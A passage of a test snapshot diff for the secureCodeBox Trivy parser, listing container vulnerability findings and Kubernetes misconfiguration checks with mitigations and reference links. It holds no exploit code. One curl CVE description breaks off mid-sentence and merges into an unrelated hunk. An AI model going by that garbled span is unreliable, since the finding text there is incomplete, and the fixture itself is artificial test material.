"scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "Denial of service using InstrumentHandlerCounter", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - }, - { - "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2022-21698", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://access.redhat.com/errata/RHSA-2022:8057", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-2781", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://seclists.org/oss-sec/2016/q1/452", - "http://www.openwall.com/lists/oss-security/2016/02/28/2", - "http://www.openwall.com/lists/oss-security/2016/02/28/3", - "https://access.redhat.com/security/cve/CVE-2016-2781", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lore.kernel.org/patchwork/patch/793178/", - "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", - "https://www.cve.org/CVERecord?id=CVE-2016-2781", - ], - }, - "category": "Vulnerability", - "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreutils: Non-privileged session can escape to the parent session in chroot", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + "value": "https://access.redhat.com/security/cve/CVE-2022-21698", }, { "type": "URL", - "value": "http://seclists.org/oss-sec/2016/q1/452", + "value": "https://bugzilla.redhat.com/2044628", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "value": "https://bugzilla.redhat.com/2045880", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "value": "https://bugzilla.redhat.com/2050648", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2050742", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2050743", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugzilla.redhat.com/2065290", }, { "type": "URL", - "value": "https://lore.kernel.org/patchwork/patch/793178/", + "value": "https://bugzilla.redhat.com/2107342", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", + "value": "https://bugzilla.redhat.com/2107374", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-18018", - "installedVersion": "8.32-4+b1", - "packageName": "coreutils", - "references": [ - "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", - "https://access.redhat.com/security/cve/CVE-2017-18018", - "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", - "https://www.cve.org/CVERecord?id=CVE-2017-18018", - ], - }, - "category": "Vulnerability", - "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "coreutils: race condition vulnerability in chown and chgrp", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-18018", + "value": "https://bugzilla.redhat.com/2107376", }, { "type": "URL", - "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", + "value": "https://bugzilla.redhat.com/2107390", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", - "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", - ], - }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://bugzilla.redhat.com/2107392", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "curl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", - ], - }, - "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl = 9", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2020-8565", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2020-8565", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://github.com/kubernetes/kubernetes/issues/95623", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://github.com/kubernetes/kubernetes/pull/95316", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://pkg.go.dev/vuln/GO-2021-0064", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", ], }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], "severity": "LOW", @@ -57227,62 +56951,154 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", ], }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", - }, - { - "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3134-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3161-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3366-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": "2021a-0+deb10u11", + "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "DLA-3412-1", + "installedVersion": "2021a-0+deb10u1", + "packageName": "tzdata", + "references": undefined, + }, + "category": "Vulnerability", + "description": undefined, + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": undefined, + "name": "tzdata - new timezone database", + "references": [], + "severity": "INFORMATIONAL", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0001", + ], + }, + "category": "Misconfiguration", + "description": "Disable anonymous requests to the API server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set '--anonymous-auth' to 'false'.", + "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://avd.aquasec.com/misconfig/kcv0001", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0006", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0006", + ], + }, + "category": "Misconfiguration", + "description": "Verify kubelet's certificate before establishing connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", + "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://avd.aquasec.com/misconfig/kcv0006", }, { "type": "URL", - "value": 